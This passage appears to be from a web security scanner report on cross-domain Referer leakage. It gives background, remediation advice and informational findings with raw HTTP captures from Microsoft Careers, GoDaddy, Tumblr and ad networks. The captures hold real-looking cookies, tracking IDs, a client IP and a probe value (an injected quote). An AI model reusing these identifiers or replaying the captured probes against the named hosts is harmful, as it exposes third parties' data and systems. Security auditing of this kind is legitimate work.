http://www.microsoft-careers.com/search
https://www.microsoft-careers.com/find.job
https://www.microsoft-careers.com/talentcommunity/subscribe/
http://www.register.com/domain/searchresults.rcmx
http://www.register.com/unauthenticated_session_expired.rcmx
https://www.sslmatrix.com/Order/quickorder

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

17.1. http://assets.tumblr.com/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.tumblr.com
Path:	/iframe.html

Issue detail

The page was loaded from a URL containing a query string:

http://assets.tumblr.com/iframe.html?9&src=http%3A%2F%2Ffrankgruber.me%2Fpost%2F9680693152%2Fthe-view-looking-out-from-techcocktail-boston-at&pid=9680693152&rk=DRmMOv3e&lang=en_US&name=frankgruber

The response contains the following link to another domain:

http://www.google-analytics.com/ga.js

Request

GET /iframe.html?9&src=http%3A%2F%2Ffrankgruber.me%2Fpost%2F9680693152%2Fthe-view-looking-out-from-techcocktail-boston-at&pid=9680693152&rk=DRmMOv3e&lang=en_US&name=frankgruber HTTP/1.1
Host: assets.tumblr.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: text/html
Last-Modified: Fri, 15 Apr 2011 22:13:30 GMT
X-Varnish: 785244107
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 03 Oct 2011 13:15:11 GMT
Date: Sat, 03 Sep 2011 13:15:11 GMT
Content-Length: 3765
Connection: close

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="x-dns-prefetch-control" content="off"/>
    <link rel="icon" href="http://assets.tumblr.com/images/favicon.gif?2" type="image/gif"/>

    <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

17.2. https://careers.microsoft.com/Resumes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://careers.microsoft.com
Path:	/Resumes.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://careers.microsoft.com/Resumes.aspx?aid=47292

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1315056239&rver=5.5.4177.0&wp=MBI&wreply=https:%2F%2Fcareers.microsoft.com%2FResumes.aspx%3Faid%3D47292%26wsi%3D1&lc=1033&id=260133

Request

GET /Resumes.aspx?aid=47292 HTTP/1.1
Host: careers.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sat, 03 Sep 2011 13:23:59 GMT
Connection: close
Content-Length: 45508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link h
...[SNIP]...
<span id="ctl00_LanguageBar_LiveIdLogin_LogoButton" class="LiveID"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1315056239&rver=5.5.4177.0&wp=MBI&wreply=https:%2F%2Fcareers.microsoft.com%2FResumes.aspx%3Faid%3D47292%26wsi%3D1&lc=1033&id=260133">Sign in</a>
...[SNIP]...

17.3. https://cart.godaddy.com/basket.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/basket.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://cart.godaddy.com/basket.aspx?app%5Fhdr=

The response contains the following links to other domains:

https://email.secureserver.net/
https://img1.wsimg.com/assets/godaddy.ico
https://img1.wsimg.com/cart/plus.gif
https://img1.wsimg.com/fos/icn/ajax-spinner-small.gif
https://img2.wsimg.com/cart/css/1/cart_https_20110622.min.css?isc=%22
https://img2.wsimg.com/pc_css/1/gd_20110829_https.min.css
https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js
https://img3.wsimg.com/cart/script/cart_20110215.min.js
https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1
https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
https://login.secureserver.net/index.php
https://login.secureserver.net/index.php?isc=%22&ci=17195&prog_id=GoDaddy&app=wbe

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:48:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD311ef78c60812ba60cb9d86e; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215871&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&split=24&referringdomain=; domain=godaddy.com; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 405795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/cart/css/1/cart_https_20110622.min.css?isc=%22" /><title>
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/pc_css/1/gd_20110829_https.min.css" /><link rel="shortcut icon" href="https://img1.wsimg.com/assets/godaddy.ico" /></head>
<body id="ctl00_PageBody" style="width: 100%; margin: 0px;">

<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"></script>

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>

<script src="https://img3.wsimg.com/cart/script/cart_20110215.min.js" type="text/javascript"></script>
...[SNIP]...
<td>

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
...[SNIP]...
<strong><a href="https://login.secureserver.net/index.php">
Check My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl01_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl01_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl01_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl02_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl02_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl02_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl03_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl03_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl03_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl04_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl04_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl04_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl05_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl05_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl05_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl06_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl06_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl06_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl07_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl07_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl07_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl08_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl08_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl08_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl09_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl09_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl09_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl10_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl10_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl10_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl11_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl11_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl11_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl12_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl12_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl12_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl13_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl13_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl13_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl14_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl14_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl14_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl15_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl15_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl15_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl16_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl16_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl16_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl17_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl17_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl17_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl18_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl18_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl18_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl32_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl32_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl32_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div class="cellPadd3 ItemName b t12">
<img src="https://img1.wsimg.com/cart/plus.gif" id="ctl00_MainContent_ctl00_basketRepeater_ctl33_ctl00_imgExpand" alt="Show/Hide Bundle" class="expandImage" OnClick="atl_toggleImageDiv('#ctl00_MainContent_ctl00_basketRepeater_ctl33_ctl00_pnlChildContainer','#ctl00_MainContent_ctl00_basketRepeater_ctl33_ctl00_imgExpand');" />
Premium EV SSL (2 Years) (annual) Package
</div>
...[SNIP]...
<div style="text-align: center;">
<img alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-small.gif" />
</div>
...[SNIP]...
<div class="div_cols">
<a href="https://login.secureserver.net/index.php?isc=%22&ci=17195&prog_id=GoDaddy&app=wbe" target="_blank">Webmail</a>
...[SNIP]...

17.4. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=appnexus1

The response contains the following link to another domain:

http://adx.adnxs.com/mapuid?member=181&user=CAESEKgpi49hCX6BTIEggQaw2oU&cver=1

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESEKgpi49hCX6BTIEggQaw2oU&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 03 Sep 2011 21:31:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&user=CAESEKgpi49hCX6BTIEggQaw2oU&cver=1">here</A>
...[SNIP]...

17.5. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=dotomi&_cbust=WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D

The response contains the following link to another domain:

http://dclk-match.dotomi.com/?id=CAESEEwLMmIFrVlNJiK13_VpZpc&cver=1&_cbust=WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D

Request

GET /pixel?nid=dotomi&_cbust=WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://dclk-match.dotomi.com?id=CAESEEwLMmIFrVlNJiK13_VpZpc&cver=1&_cbust=WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 03 Sep 2011 21:42:42 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 327
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://dclk-match.dotomi.com?id=CAESEEwLMmIFrVlNJiK13_VpZpc&cver=1&_cbust=WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D">here</A>
...[SNIP]...

17.6. http://dg.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Ffrankgruber.me%2Fpost%2F9680693152%2Fthe-view-looking-out-from-techcocktail-boston-at&r=http%3A%2F%2Fmicrosoftcambridge.com%2FCommunity%2FCommittedtoCambridge%2Ftabid%2F338%2FDefault.aspx

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

GET /?y=3&t=h&u=http%3A%2F%2Ffrankgruber.me%2Fpost%2F9680693152%2Fthe-view-looking-out-from-techcocktail-boston-at&r=http%3A%2F%2Fmicrosoftcambridge.com%2FCommunity%2FCommittedtoCambridge%2Ftabid%2F338%2FDefault.aspx HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 03 Sep 2011 13:15:09 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...
<noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript>
...[SNIP]...

17.7. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315109082&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fblind-boolean-sql-injection-database-user-admin-priv-cwe89-capec66-dork-ghdb-bhdb-example-poc-report-microcadca.htm%23ConfirmedSQLInjection&dt=1315091137559&bpp=12&shv=r20110824&jsv=r20110719&correlator=1315091139994&frm=4&adk=1819763764&ga_vid=1336769970.1315091140&ga_sid=1315091140&ga_hid=1273494730&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1217&bih=1021&eid=36887101&fu=0&ifi=1&dtd=2527&xpc=gIT1wcBZhE&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/03/ghdb/blind-boolean-sql-injection-database-user-admin-priv-cwe89-capec66-dork-ghdb-bhdb-example-poc-report-microcadca.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DSecurity%2BVulnerability%2BScanner%26adU%3Dgfi.com/Business-Antivirus%26adT%3DSMB%2BCyber%2BProtection%2BTips%26adU%3Dwww.OutSystems.com/WebAppDev%26adT%3DWeb%2BApp%2BDevelopment%2BTool%26gl%3DUS&usg=AFQjCNFEmrHcKaAFVaMqLDRf52MfeQPBQA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315109082&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fblind-boolean-sql-injection-database-user-admin-priv-cwe89-capec66-dork-ghdb-bhdb-example-poc-report-microcadca.htm%23ConfirmedSQLInjection&dt=1315091137559&bpp=12&shv=r20110824&jsv=r20110719&correlator=1315091139994&frm=4&adk=1819763764&ga_vid=1336769970.1315091140&ga_sid=1315091140&ga_hid=1273494730&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1217&bih=1021&eid=36887101&fu=0&ifi=1&dtd=2527&xpc=gIT1wcBZhE&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

17.8. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9606044588835202&output=html&h=250&slotname=3304066092&w=250&lmt=1315073748&flash=10.3.183&url=http%3A%2F%2Ffrankgruber.me%2Fpost%2F9680693152%2Fthe-view-looking-out-from-techcocktail-boston-at&dt=1315055747796&bpp=34&shv=r20110824&jsv=r20110719&correlator=1315055748620&frm=4&adk=1353305767&ga_vid=17686447.1315055749&ga_sid=1315055749&ga_hid=1719381278&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=lucida%20sans&dfs=12&biw=1217&bih=1037&ref=http%3A%2F%2Fmicrosoftcambridge.com%2FCommunity%2FCommittedtoCambridge%2Ftabid%2F338%2FDefault.aspx&fu=0&ifi=1&dtd=1490&xpc=SI8ZGFwmoV&p=http%3A//frankgruber.me

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
